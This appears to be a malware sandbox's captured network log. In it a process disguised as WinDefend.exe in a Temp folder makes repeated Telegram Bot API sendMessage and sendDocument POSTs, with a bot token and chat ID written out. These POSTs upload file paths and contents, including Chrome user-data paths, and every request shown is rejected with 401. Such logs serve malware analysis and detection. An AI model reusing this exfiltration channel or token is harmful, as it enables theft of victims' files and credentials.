2024-05-23 13:35:52 UTC	4096	OUT	Data Raw: 4f 1f ec ef 14 c6 95 39 79 65 fe 32 96 52 c9 e9 d5 41 15 3c 02 96 1d 29 86 3d 24 55 f8 d0 e5 f4 e4 f0 c7 bd ed 8d 0d 81 8e 40 07 40 a0 63 53 64 80 35 0e 74 e2 c9 99 b7 84 2c d2 39 9b d7 7d f7 ce 07 79 cf 10 4d 8f c6 77 fb 01 df d2 07 cd 5a 63 06 3a cf fe 78 f2 70 70 bb 60 02 ba dd bb 7b 58 f4 a0 59 71 16 56 f4 b4 9a b9 6b 7b 02 9d f3 e5 28 bd 3b 0f 8f 32 c2 8b e9 ef 27 49 ff 76 40 6e 91 f7 98 52 41 f8 12 bc 50 68 c6 c9 47 c3 de 57 2b 2e 37 0b 79 e2 f2 3c 13 ea 27 87 27 59 19 ee c3 1f ce a4 39 3b bd de 8e 40 07 00 81 8e 40 07 40 a0 b3 98 40 27 28 e0 b8 9c f1 0e 0e ee 8f 26 c7 b3 33 ba c7 e3 77 9f 6f 02 12 f4 0d 7d d0 8e 3c 51 03 9d c0 e7 c2 b6 7a 3f fc f0 28 6b c9 46 c0 f4 3e 60 ff 11 73 d7 76 05 3a e7 09 c8 ed fe 9b d7 f7 3f 3a 9e 8c ee df 0b ae e0 05 5b Data Ascii: O9ye2RA<)=$U@@cSd5t,9}yMwZc:xpp`{XYqVk{(;2'Iv@nRAPhGW+.7y<''Y9;@@@@'(&3wo}<Qz?(kF>`sv:?:[
2024-05-23 13:35:52 UTC	4096	OUT	Data Raw: 95 d3 8f d8 79 7d 54 b4 73 7b da eb 0c 36 32 1e dd 4c 5f 1b 99 9a 1f e7 dc 33 e6 d7 fa 16 7d c7 3b 77 30 99 2b cc eb be 88 a1 a9 40 27 63 1d 7b f6 4a cb 94 71 c0 67 a3 e7 33 a5 a0 61 77 fa 0d 2c e5 8e bb 9c b1 57 eb 2f 7d fa c0 62 23 6b f9 7d fe 97 3f 69 e3 ad a5 f4 03 a5 bf 16 6b 47 a7 14 2c 52 1b 29 9b 8e fd 3a e9 bd dc 78 5f f4 c2 17 93 e1 77 02 87 9b a9 ad 29 6b 38 d8 aa 76 1a e9 36 14 f9 d2 94 91 3e f8 4e 5f db 9f d5 3c e7 87 dd b1 1b 72 95 db 5c e6 a5 7f b1 7f c4 42 9a 70 ac 1a 15 e7 3a 56 ab a8 ad 69 35 cb 19 54 44 b8 a1 c4 ea 6c 17 30 c0 68 24 d0 69 62 e0 5a ea ee 19 ab f9 47 6a a7 71 27 08 e5 7a ce f4 ba 5a ad 46 2d fc b5 00 02 1d 81 4e 27 03 9d f4 9c 38 fb fb 9f dc b6 17 de 7b 16 fe 8a dc 6f 78 b2 f3 da 94 d3 49 bd 87 65 1e 55 fa 0d 2f b3 6f ca Data Ascii: y}Ts{62L_3};w0+@'c{Jqg3aw,W/}b#k}?ikG,R):x_w)k8v6>N_<r\Bp:Vi5TDl0h$ibZGjq'zZF-N'8{oxIeU/o
2024-05-23 13:35:52 UTC	4096	OUT	Data Raw: bc ea 72 b9 c7 d6 a6 2c b0 b8 bf 7e f2 78 fc ee 8d ab 7c 7a 2b 7a eb de fd 52 c3 f4 ab 8f 4a 92 7b e9 43 81 8b 4b 53 e1 63 53 6e 03 55 8f 70 a5 da 67 ca dd 71 ab 37 38 b8 f1 54 fc 6a f5 03 ad ee 94 96 d8 46 ca 1d c0 dc 6f 6f ea f7 9e 75 cb 37 3e fc ec 65 16 99 d7 65 b6 1b 3f db 24 f5 fc ed b0 1d ea bd 9b bd 0d 95 bf 34 5f 8e 07 5f b9 2c e8 cc f7 dd d6 ae ae ef cc bd 7f a4 f6 7d b6 c3 0d 39 6a 13 8e 34 b0 69 f6 3a d6 ec 43 96 dd 6a 56 64 50 11 bb b3 5d d4 00 63 f9 03 d7 f6 34 ff 68 fd 6d 97 08 74 04 3a 02 1d a8 72 5f 04 a0 83 66 97 0f 04 ac b9 03 30 70 a5 c5 52 97 d9 a6 be 26 8c 28 04 3a e0 be 08 c0 12 ba f7 ac f7 b9 00 18 b8 d2 0d a9 0f 39 a6 bd a0 7d 65 d8 14 b9 f3 45 06 ee 8b 00 54 32 bb 29 ac 2f 30 01 03 57 da e4 e2 d1 da e7 9e 3f 4a b6 b5 97 7c 92 b9 Data Ascii: r,~x\|z+zRJ{CKScSnUpgq78TjFoou7>ee?$4__,}9j4i:CjVdP]c4hmt:r_f0pR&(:9}eET2)/0W?J\|
2024-05-23 13:35:52 UTC	4096	OUT	Data Raw: de 1b a3 0b 0e 30 63 e9 fe c5 ab a6 87 ef 5d 6e 08 72 3c 19 0d fb e7 f3 87 cd cd 6f ff ed f0 af e6 4b 60 29 81 4e ce 42 8f 97 7a 83 e4 aa b2 5d 1d 7f 63 6b 58 b2 9e 18 da d8 ed df 7d f8 a2 b6 9c fe de bf 1f f4 6e 5d 5e cd 5e 6f 27 f8 00 96 77 6a 95 02 9d b8 05 12 b9 a2 46 2a ed a6 02 9d 17 7b f4 8c 2e 7b a4 cf cf 8e 23 3d 9f c9 5c a6 11 b1 0c 33 96 38 6d f5 fe e6 e0 bf cc bf ae 7e 7a 34 fe 69 f2 66 5a 31 d6 df cc 25 27 dd 9e 2d c0 8b b7 a9 ff 5d fa a5 cc 7e 7b 7a ce 72 c8 6b 65 98 f7 e1 cd 04 3a b1 cf 54 a0 03 00 b0 9a 81 4e c8 a2 a6 c0 87 80 32 a4 0f 31 a3 05 3a 99 fb 44 64 fd f7 36 06 3a 39 5f bf 17 1c 60 e8 16 3c b3 57 e7 74 ee db 9a 40 a7 e8 6b f0 a2 d3 f9 c6 fe 83 a3 8a 2b 02 b2 1f 1a 2a 59 74 17 fb e9 26 49 72 73 03 e3 a5 9d 5a a5 40 27 6e 81 c4 ad Data Ascii: 0c]nr<oK`)NBz]ckX}n]^^o'wjF{.{#=\38m~z4ifZ1%'-]~{zrke:TN21:Dd6:9_`<Wt@k+Yt&IrsZ@'n
2024-05-23 13:35:52 UTC	4096	OUT	Data Raw: c1 97 74 11 af be 2e bb 56 c3 2f 0b 21 f0 5c ca fe 7c a1 ab 2f d0 2a d5 c9 fc 51 44 c9 7e 66 a6 02 87 7e 81 56 a3 b6 a4 07 3a d5 3f 70 36 d0 99 1b 25 17 f4 4b e5 2f eb 8b fd d4 82 16 71 34 15 e8 c4 6c 9b 55 ee 4a 0b 08 74 aa 34 ea 1b 81 4e da 05 9a 9d 9a a6 fd c0 d5 30 f4 c6 40 b3 fa 25 58 62 a0 73 75 1f 49 1b a8 e4 de 47 62 ed a1 13 ad 4b ac 7e 81 96 19 e8 cc cc 94 02 97 d7 5d e5 56 e9 c9 d7 ec f3 26 d7 5a 74 e5 61 cc d5 9e 03 e9 c3 98 6b eb 47 9a 0a 74 2a 8e b1 2b 0c ea 52 8b f1 da 37 6a 29 3f 30 93 1e 5e eb 82 2a 5f 9d cc 56 53 71 0c 79 b9 37 56 89 d7 27 d5 09 74 22 5f af 78 a3 c7 65 05 3a d9 af 2d 9f 0d 74 2a be ce 3c fd b1 92 45 4e 5d 2b d7 87 ea b3 2d 81 8e 40 e7 fa b8 67 3e be 7d 51 7b ae f5 ce 97 7f 99 d3 57 a6 fd cc d5 4d 22 fd f9 ff 98 81 4e 46 Data Ascii: t.V/!\\|/QD~f~V:?p6%K/q4lUJt4N0@%XbsuIGbK~]V&ZtakGt+R7j)?0^_VSqy7V't"_xe:-t<EN]+-@g>}Q{WM"NF
2024-05-23 13:35:52 UTC	4096	OUT	Data Raw: cc 5f 36 c0 0d ca 85 09 d2 13 ad a3 04 dc e8 55 f3 ca f2 2e 00 dc 00 5c 1a 3a f4 9d 2f a0 06 6d f5 0f 87 4b a3 c8 af d7 a2 54 00 00 00 c0 f5 05 04 1d 00 f8 7e be 1a 41 d0 f9 61 72 de 1f db 78 0b 21 01 37 47 d5 04 41 07 b8 a9 be c3 af ed a2 c8 d0 56 ff 63 15 a3 4b d3 1c 40 16 04 00 00 b8 4a c0 29 f2 4d ff c8 00 e0 9a 7c 35 82 a0 f3 c3 a4 30 36 18 86 e7 dc c4 55 13 04 1d e0 c6 29 8d 8f d8 be 35 65 f2 f2 49 dc 30 b0 02 da ea 2b 15 a3 95 f6 15 af ac 1e 3b 63 e8 b2 d9 0d 20 0b 02 00 00 5c 35 20 e8 00 00 00 82 0e 00 dc b0 55 13 04 1d e0 c6 2b 8d 13 fb 09 9e b3 c6 0f 83 01 81 ab e9 6f 4c 6d e5 26 00 00 00 60 02 40 d0 01 00 00 04 1d 00 b8 e1 3f a1 41 d0 01 6e 9c d2 78 f5 8b dd 00 c0 04 fd 8d a9 ad dc 04 00 00 00 4c 00 08 3a 00 00 80 a0 03 00 37 fc 27 34 08 3a c0 Data Ascii: _6U.\:/mKT~Aarx!7GAVcK@J)M\|506U)5eI0+;c \5 U+oLm&`@?AnxL:7'4:
2024-05-23 13:35:52 UTC	4096	OUT	Data Raw: 23 64 76 20 91 ce 52 b9 21 7a 60 98 1b f9 2a 39 30 cc a4 b3 04 cb e4 f8 da 94 23 69 f4 d7 48 32 3d 94 1e f8 2a 3d 78 2e 3d 80 ee 62 38 f7 e5 57 d9 73 5f 72 03 43 c8 d8 dc 20 3a 25 35 30 52 f8 6f 32 3b 82 b6 e9 81 2f 53 b9 61 16 25 2c cb ff 37 39 30 52 50 73 be 17 41 07 00 00 00 00 00 00 00 80 7f 08 41 87 e2 58 7a 94 a0 33 ae 5d 9c 7e 55 18 9e 73 5e d0 e1 b8 38 c3 46 48 2a 88 27 82 38 11 21 98 18 c5 f5 c5 12 3d 91 44 47 7f b8 2d 10 3f da d4 fb fe fa ed 2f be f1 3e 0a 8c 30 c9 bc 54 c1 cf 1e 0a 53 64 88 e4 e7 5b 25 38 14 09 4b 5c 14 74 58 1a 59 8c a6 78 01 25 1f 3f ce f2 12 0f 95 57 76 d0 bf e2 34 89 ce cd 6b 1c ec 79 f9 26 93 42 5b 74 fa f9 84 a1 c0 d1 53 b1 52 e8 b0 7c 6a f9 39 53 2c 3a 2b 3f 48 87 1f a7 83 27 93 89 c2 a4 aa fc 78 9f c2 84 ac 44 41 c4 49 Data Ascii: #dv R!z`90#iH2==x.=b8Ws_rC :%50Ro2;/Sa%,790RPsAAXz3]~Us^8FH*'8!=DG-?/>0TSd[%8K\tXYx%?Wv4ky&B[tSR\|j9S,:+?H'xDAI
2024-05-23 13:35:53 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:53 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
226	192.168.2.5	61277	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:52 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 348 Expect: 100-continue
2024-05-23 13:35:53 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:53 UTC	348	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 33 32 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 74 Data Ascii: chat_id=1655240967&text=File%3A+32.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applicat
2024-05-23 13:35:53 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:53 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
227	192.168.2.5	61278	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:52 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 226 Expect: 100-continue
2024-05-23 13:35:53 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:53 UTC	226	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 63 6f 72 65 5f 69 63 6f 6e 73 5f 68 69 67 68 63 6f 6e 74 72 61 73 74 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 68 69 5f 63 6f 6e 74 72 61 73 74 25 35 43 63 6f 72 65 5f 69 63 6f 6e 73 5f 68 69 67 68 63 6f 6e 74 72 61 73 74 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 31 31 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+core_icons_highcontrast.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Chi_contrast%5Ccore_icons_highcontrast.png%0ASize%3A+11+KB
2024-05-23 13:35:53 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:53 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
228	192.168.2.5	61280	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:54 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="e00c1ca2-72ac-4840-9ced-6bd7ad730a7f" Host: api.telegram.org Content-Length: 12617 Expect: 100-continue
2024-05-23 13:35:54 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:54 UTC	40	OUT	Data Raw: 2d 2d 65 30 30 63 31 63 61 32 2d 37 32 61 63 2d 34 38 34 30 2d 39 63 65 64 2d 36 62 64 37 61 64 37 33 30 61 37 66 0d 0a Data Ascii: --e00c1ca2-72ac-4840-9ced-6bd7ad730a7f
2024-05-23 13:35:54 UTC	133	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 63 6f 72 65 5f 69 63 6f 6e 73 5f 68 69 67 68 63 6f 6e 74 72 61 73 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 63 6f 72 65 5f 69 63 6f 6e 73 5f 68 69 67 68 63 6f 6e 74 72 61 73 74 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=core_icons_highcontrast.png; filename*=utf-8''core_icons_highcontrast.png
2024-05-23 13:35:54 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 bc 00 00 01 2c 08 03 00 00 00 16 ea 90 af 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 02 d6 50 4c 54 45 ff ff ff ff ff ff b9 b9 b9 ab ab ab 24 be ff 0a bd ff 7e 7e 7e 78 78 78 74 74 74 ff 4a 40 21 75 c9 66 66 66 0d 71 ce 45 45 45 00 00 00 ff ff ff b9 b9 b9 24 be ff 7e 7e 7e 78 78 78 74 74 74 ff 4a 40 21 75 c9 19 73 cb 0d 71 ce 45 45 45 00 00 00 ff ff ff b9 b9 b9 89 b5 e2 7e 7e 7e 78 78 78 74 74 74 ff 4a 40 21 75 c9 66 66 66 19 73 cb 0d 71 ce 45 45 45 00 00 00 ff ff ff 89 b5 e2 7e 7e 7e 78 78 78 74 74 74 ff 4a 40 21 75 c9 66 66 66 45 45 45 00 00 00 ff ff ff c5 c5 c5 87 b4 e1 ab ab ab 24 be ff 0a bd ff 7e 7e 7e 7c 7c 7c 78 78 78 74 74 74 70 70 70 ff 4a 40 21 75 c9 00 00 00 ff ff ff ab ab ab a5 Data Ascii: PNGIHDR,sBITOPLTE$~~~xxxtttJ@!ufffqEEE$~~~xxxtttJ@!usqEEE~~~xxxtttJ@!ufffsqEEE~~~xxxtttJ@!ufffEEE$~~~\|\|\|xxxtttpppJ@!u
2024-05-23 13:35:54 UTC	4096	OUT	Data Raw: 71 7b 90 45 c8 4c 8a a7 fc 54 a1 a7 a7 24 5e 5b 6f 02 26 de bf bd a2 eb ef b2 f2 ef ea fa be ff 03 58 f0 7e da bd 64 eb 11 be 29 0d 7a f9 a5 94 20 5b 29 be 29 09 7a 5b f2 dd 7c e3 a6 bc 10 6d 30 29 c9 04 4c a3 d4 5a 40 c2 d7 e8 a4 15 a5 1e a6 2f ec ad c3 f6 43 91 28 d3 b4 97 00 da e5 0b dc f7 d7 12 f1 d6 f6 d3 3d 58 e6 8f a8 17 aa 5d ed a7 ea e2 e5 c0 a5 a8 2e 77 2f e2 7d 7f af 69 a4 eb 2f 7f 00 b0 e0 09 de 85 1a dc f3 32 c1 92 78 17 ea 79 3b 84 92 68 bc 90 bf 89 6d d6 49 ee ea 4e f1 96 b7 f6 e7 72 fd ad 72 f1 56 66 58 4e 83 bc 01 06 d7 bc 8a f7 c9 c3 4b c5 fe 27 3e 21 af 85 cb b5 b7 81 88 b7 a1 57 48 19 80 8a 78 3d 84 0d 1c 25 f1 da 03 0d 9f c4 fb b7 7d aa 9e f7 5e ae dd 85 f7 9e c1 d5 fb 8c d4 22 c1 b5 1b 4e 84 b8 7a d3 92 f2 f1 3c 7b 6b e1 9f 83 77 aa Data Ascii: q{ELT$^[o&X~d)z [))z[\|m0)LZ@/C(=X].w/}i/2xy;hmINrrVfXNK'>!WHx=%}^"Nz<{kw
2024-05-23 13:35:54 UTC	4067	OUT	Data Raw: ad 31 62 60 9e f7 26 6b 8c 78 8e e4 79 d7 6f 25 fd 35 45 ed f2 b5 4b d9 52 a6 d2 c2 5e c6 e4 0a 65 a4 26 5e b2 cd 05 53 e9 66 56 9c 9f 00 88 97 0d 08 b7 b7 69 19 ad ad 5d 0c 16 1f 1d c7 24 34 e8 cf 35 e2 22 4a 18 12 0e 37 e9 76 f7 f0 88 18 61 5b 61 a4 7b c1 23 6c 97 19 e9 de b9 32 c2 36 bc 75 bd 6a cc 10 48 11 f5 12 8f 9a d0 53 f2 d0 c1 cb 6c 08 2f e2 6d b4 6d c3 c4 6b 9f 20 c6 a7 97 4b 2a 29 9c 8a 93 71 1f 7a 20 fd b4 b6 ca ee 7c 3e 5e d9 06 f6 bc 5a 65 86 a7 30 f8 fd 20 d8 ed c7 84 e1 e3 67 6e c3 c0 f0 e6 f3 20 e5 ec 84 52 7a 8f 4e fe 85 cc cf f5 e6 79 8b 90 d4 62 9b 12 59 97 a4 33 cc a8 36 5b dc c3 06 e5 4a 0a af 22 d9 c8 2d 4d 92 f0 29 91 95 f0 69 e5 75 b6 59 bc 55 49 f7 8c 89 57 1c b3 ca d6 28 cf 2a bb ce 8f 59 65 25 98 cf 2b 20 4e 57 07 ce 2d f7 32 Data Ascii: 1b`&kxyo%5EKR^e&^SfVi]$45"J7va[a{#l26ujHSl/mmk K)qz \|>^Ze0 gn RzNybY36[J"-M)iuYUIW(Ye%+ NW-2
2024-05-23 13:35:54 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 65 30 30 63 31 63 61 32 2d 37 32 61 63 2d 34 38 34 30 2d 39 63 65 64 2d 36 62 64 37 61 64 37 33 30 61 37 66 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --e00c1ca2-72ac-4840-9ced-6bd7ad730a7fContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:54 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:54 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 65 30 30 63 31 63 61 32 2d 37 32 61 63 2d 34 38 34 30 2d 39 63 65 64 2d 36 62 64 37 61 64 37 33 30 61 37 66 2d 2d 0d 0a Data Ascii: --e00c1ca2-72ac-4840-9ced-6bd7ad730a7f--
2024-05-23 13:35:54 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:54 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
229	192.168.2.5	61281	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:54 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 257 Expect: 100-continue
2024-05-23 13:35:54 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:54 UTC	257	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 61 62 32 37 62 33 35 35 35 30 32 62 32 33 65 64 63 35 37 64 63 63 34 36 35 36 33 35 63 33 66 35 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 61 70 70 31 25 35 43 64 63 2d 64 65 73 6b 74 6f 70 2d 61 70 70 2d 64 72 6f 70 69 6e 25 35 43 31 2e 30 2e 30 5f 31 2e 30 2e 30 25 35 43 61 62 32 37 62 33 35 35 35 30 32 62 32 33 65 64 63 35 37 64 63 63 34 36 35 36 33 35 63 33 66 35 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 31 30 2b Data Ascii: chat_id=1655240967&text=File%3A+ab27b355502b23edc57dcc465635c3f5.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Capp1%5Cdc-desktop-app-dropin%5C1.0.0_1.0.0%5Cab27b355502b23edc57dcc465635c3f5.png%0ASize%3A+10+
2024-05-23 13:35:54 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:54 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
230	192.168.2.5	61282	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:54 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 347 Expect: 100-continue
2024-05-23 13:35:54 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:54 UTC	347	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 34 38 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 74 Data Ascii: chat_id=1655240967&text=File%3A+48.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applicat
2024-05-23 13:35:54 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:54 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
231	192.168.2.5	61283	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:55 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 240 Expect: 100-continue
2024-05-23 13:35:55 UTC	240	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 63 6f 72 65 5f 69 63 6f 6e 73 5f 68 69 67 68 63 6f 6e 74 72 61 73 74 5f 72 65 74 69 6e 61 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 68 69 5f 63 6f 6e 74 72 61 73 74 25 35 43 63 6f 72 65 5f 69 63 6f 6e 73 5f 68 69 67 68 63 6f 6e 74 72 61 73 74 5f 72 65 74 69 6e 61 2e 70 6e 67 25 30 41 53 69 7a 65 